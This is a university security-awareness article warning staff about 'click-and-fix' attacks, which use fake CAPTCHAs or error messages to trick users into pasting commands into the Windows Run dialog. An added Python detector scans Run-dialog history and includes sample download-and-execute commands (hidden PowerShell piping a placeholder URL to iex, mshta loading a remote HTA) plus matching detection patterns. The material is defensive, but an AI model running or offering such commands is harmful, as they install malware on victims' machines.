Security Month: Warning about a new type of cyberattack
The attack method involves tricking you into copying malicious content and pasting it into your own computer, which can harm your computer, your data, and OsloMet.
A new and cunning method aims to make you activate malware yourself.
"We can call it the 'click-and-fix attack', a method where you are tricked into executing commands on your own computer. The perpetrators of the cyberattack make you 'fix' something via clicking and pasting," explains Gustav Birkeland, Chief Information Security Officer (CISO) at OsloMet.
Robot verifications and error messages
According to Microsoft, such attacks are being observed increasingly often. They are commonly disguised as "I am not a robot" verifications (CAPTCHAs) or as fake error messages that look authentic.
"This makes it challenging even for modern security tools to block the attack because it is your clicks and actions that activate the malicious code. We have observed such attacks in which OsloMet users were deceived. So far, these have been stopped by security measures implemented by the IT Department," says Birkeland.
Here are some examples of what organizations can be exposed to:
- Theft of passwords and login credentials.
- Computers being used to spread cyberattacks within the organization's systems and to partners.
- Attackers sending emails to entire contact lists from employees' accounts.
- Files and data being deleted, locked, or misused for, e.g., identity theft.
- Organizations losing access to critical systems.
What should you be particularly cautious about?
- Messages or websites claiming you need to "fix something now" with a single click or verification.
- "PC support" or "fix problems" videos on platforms such as YouTube and TikTok that claim to help with a slow computer or with removing viruses. These may include copy-and-paste commands that install malware.
- Requests to copy commands and paste them somewhere else, for example into the Windows "Run" dialog (Windows key + R), a quick way to start programs, folders, or system tools by typing their names into a small text field.
- "I am not a robot" pop-ups (CAPTCHA) or verifications that lead you to additional steps. Attackers exploit the fact that we are used to clicking through such checks and add extra steps that damage your computer, your data, and OsloMet.
- Web addresses that look suspicious, such as strange website names with only numbers and symbols.
- Pop-up windows attempting to scare or pressure you into acting immediately. Such warnings can also come in the form of emails or SMS messages, attempting to force you to act quickly.
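As an added illustration for IT staff (not part of the OsloMet article), the following Python checks the Windows Run-dialog history (the RunMRU registry key, which records what users typed after Windows key + R) for commands that resemble click-and-fix lures; the heuristic patterns and the sample entries are constructed assumptions, not indicators from this article.

```python
import re

# Constructed sample of HKCU\...\Explorer\RunMRU values: each entry ends in "\1"
# and MRUList lists entry names most-recent-first. Illustrative, not real IoCs.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": 'powershell -w hidden -ep bypass -c "iwr https://example.invalid/v|iex"\\1',
    "c": "mshta https://example.invalid/verify.hta\\1",
}

# Heuristics assumed for this example (traits commonly reported in click-and-fix lures).
SUSPICIOUS = [
    (re.compile(r"\bmshta\b.*https?://", re.I), "mshta loading remote content"),
    (re.compile(r"\bpowershell\b.*(-w(indowstyle)?\s+hidden|-enc|\biex\b|iwr|downloadstring)", re.I),
     "hidden, encoded or downloading PowerShell"),
    (re.compile(r"\b(curl|certutil|bitsadmin)\b.*https?://", re.I), "download utility with URL"),
]

def parse_runmru(values):
    """Return (name, command) pairs, most recent first, with the '\\1' suffix stripped."""
    out = []
    for name in values.get("MRUList", ""):
        raw = values.get(name)
        if raw is not None:
            out.append((name, raw[:-2] if raw.endswith("\\1") else raw))
    return out

def find_clickfix_candidates(values):
    """Return (command, reason) for every Run-dialog entry matching a heuristic."""
    hits = []
    for _, cmd in parse_runmru(values):
        for pattern, reason in SUSPICIOUS:
            if pattern.search(cmd):
                hits.append((cmd, reason))
                break
    return hits

def read_runmru_from_registry():
    """Read the live RunMRU key on Windows; returns {} elsewhere or if the key is missing."""
    try:
        import winreg
        key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU")
    except (ImportError, OSError):
        return {}
    values = {}
    for i in range(winreg.QueryInfoKey(key)[1]):  # [1] is the number of values under the key
        name, data, _ = winreg.EnumValue(key, i)
        values[name] = data
    return values
```

On a Windows machine, `find_clickfix_candidates(read_runmru_from_registry())` inspects the current user's real Run history; elsewhere the constructed sample shows the expected output shape.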
What should you do if you're unsure?
- Stop and think. Don't let yourself be pressured into clicking.
- Check the sender and web address. Are they trustworthy?
- Do not paste commands or perform what they are asking you to do.
- Take a screenshot and report it to sikkerhet@oslomet.no.
- Don't be fooled by verification pages. Genuine system alerts usually don't require you to execute commands yourself.
If in doubt, contact the IT Service Desk first.
IT Service Desk: itservicedesk@oslomet.no
This article is part of OsloMet's Security Month 2025.
(This text has been translated with the use of Sikt KI-Chat. The text has been quality assured by OsloMet.)